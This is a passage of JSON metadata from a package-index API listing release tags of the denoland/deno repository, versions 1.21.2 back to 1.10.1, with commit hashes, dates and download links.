s/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/